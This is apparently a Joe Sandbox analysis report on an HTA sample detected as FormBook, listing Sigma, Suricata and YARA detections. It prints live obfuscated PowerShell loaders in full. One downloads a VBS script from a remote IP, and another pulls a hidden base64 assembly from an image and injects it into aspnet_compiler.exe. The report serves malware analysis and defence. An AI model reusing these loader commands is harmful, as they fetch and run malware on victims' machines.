XN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICA

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , ProcessId: 2928, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3924, ProcessName: aspnet_compiler.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline", ProcessId: 6348, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , ProcessId: 2928, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", CommandLine: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgI

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline", ProcessId: 6348, ProcessName: csc.exe

Suricata Signatures

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T07:21:31.595194+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.5	49706	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T07:21:19.798161+0100	2858795	1	A Network Trojan was detected	192.168.2.5	49704	172.245.123.12	80	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T07:21:51.952862+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.5	49760	104.21.84.67	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: createdbetterthingswithgreatnressgivenmebackwithnice.hta	Virustotal: Detection: 31%			Perma Link
Source: createdbetterthingswithgreatnressgivenmebackwithnice.hta	ReversingLabs: Detection: 15%

Yara detected FormBook

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: createdbetterthingswithgreatnressgivenmebackwithnice.hta, type: SAMPLE

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49760 version: TLS 1.2

Source:	Binary string: Automation.pdb source: powershell.exe, 00000003.00000002.2227776899.000000000294E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Managem..Automation.pdb source: powershell.exe, 00000003.00000002.2227776899.000000000294E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2537047764.0000000006C1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2534836877.0000000006790000.00000004.00000800.00020000.00000000.sdmp
